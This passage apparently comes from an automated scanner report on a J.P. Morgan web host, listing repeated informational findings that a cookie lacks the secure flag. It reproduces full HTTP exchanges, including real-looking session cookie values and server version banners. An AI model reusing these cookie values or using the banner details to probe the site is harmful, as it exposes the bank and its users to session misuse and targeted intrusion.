The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.jsp?pageName=country_earea HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.4.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA

Response

HTTP/1.1 302 Found
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:21 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Location: https://iblogin.jpmorgan.com/sso/action/federateLogin?URI=https%3a%2f%2fmm.jpmorgan.com%3a443%2findex.jsp%3fpageName%3dcountry_earea&msg=+&securityLevel=0&cs=67%2bwndJznEzJNkT9QmX2jX9JYMs%3d
Vary: Accept-Encoding
Content-Length: 386
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://iblogin.jpmorgan.com/sso/action/federat
...[SNIP]...

7.79. https://mm.jpmorgan.com/js/dropdowns.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/dropdowns.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/dropdowns.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"23404-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 23404
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

// Function to get a new XML Http Request object
function AJAXRequest() {
   if (window.XMLHttpRequest) {
       return new XMLHttpRequest();
   }
   else if (window.ActiveXObject) {
       return new ActiveXOb
...[SNIP]...

7.80. https://mm.jpmorgan.com/js/feedback.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/feedback.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/feedback.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"0-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript


7.81. https://mm.jpmorgan.com/js/gecFunctions.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/gecFunctions.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/gecFunctions.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"1705-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 1705
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

var submitGecForm = function() {
   if (document.getElementById('gecForm').action != 'MorganMarkets?page=global_equity_coverage') {
       document.getElementById('gecForm').action = 'MorganMarkets?page=gl
...[SNIP]...

7.82. https://mm.jpmorgan.com/js/menu.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/menu.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/menu.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:51 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"6916-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:51 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 6916
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

function hideMenus(element) {
   if(YAHOO.env.ua.ie == 6) {
       return;    
   }

   var lines = YAHOO.util.Dom.getElementsByClassName('showLine', 'li', 'jpmmenu');
   var subLines = YAHOO.util.Dom.getElemen
...[SNIP]...

7.83. https://mm.jpmorgan.com/js/personalisation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/personalisation.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/personalisation.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"15959-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 15959
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

//Function to get a new XML Http Request object
function AJAXRequest() {
   if (window.XMLHttpRequest) {
       return new XMLHttpRequest();
   }
   else if (window.ActiveXObject) {
       return new ActiveXObj
...[SNIP]...

7.84. https://mm.jpmorgan.com/js/portalBondIndex.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/portalBondIndex.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/portalBondIndex.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"8066-1310119358000"
Last-Modified: Fri, 08 Jul 2011 10:02:38 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 8066
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

function makeUrl(url) {
//prefixUrl = "http://morganmarkets.jpmorgan.com";
prefixUrl = "";
fullUrl = prefixUrl + url;
return fullUrl;
}

function docLoc(relUrl) {
//prefix = 'http://mo
...[SNIP]...

7.85. https://mm.jpmorgan.com/js/portlet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/portlet.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/portlet.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:51 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"7376-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:51 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 7376
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

function refreshAllCheckBoxDivs(portletId,checkBoxSize,displayMaxRows)
{
// var displayMaxRows = 10;
   var portletDiv = document.getElementById(portletId);        
   var visibleDivs = 0;
   var chec
...[SNIP]...

7.86. https://mm.jpmorgan.com/js/yui/button-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/button-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/button-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"27973-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 27973
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var G=YAHOO.util.Dom,M=YAHOO.util
...[SNIP]...

7.87. https://mm.jpmorgan.com/js/yui/connection-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/connection-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/connection-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"13048-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 13048
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
YAHOO.util.Connect={_msxml_progid:["Microsoft
...[SNIP]...

7.88. https://mm.jpmorgan.com/js/yui/container-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/container-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/container-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"74941-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:55 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 74941
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){YAHOO.util.Config=function(D){if(
...[SNIP]...

7.89. https://mm.jpmorgan.com/js/yui/element-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/element-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/element-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"9242-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 9242
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
YAHOO.util.Attribute=function(B,A){if(A){thi
...[SNIP]...

7.90. https://mm.jpmorgan.com/js/yui/event-delegate-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/event-delegate-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ACE_COOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

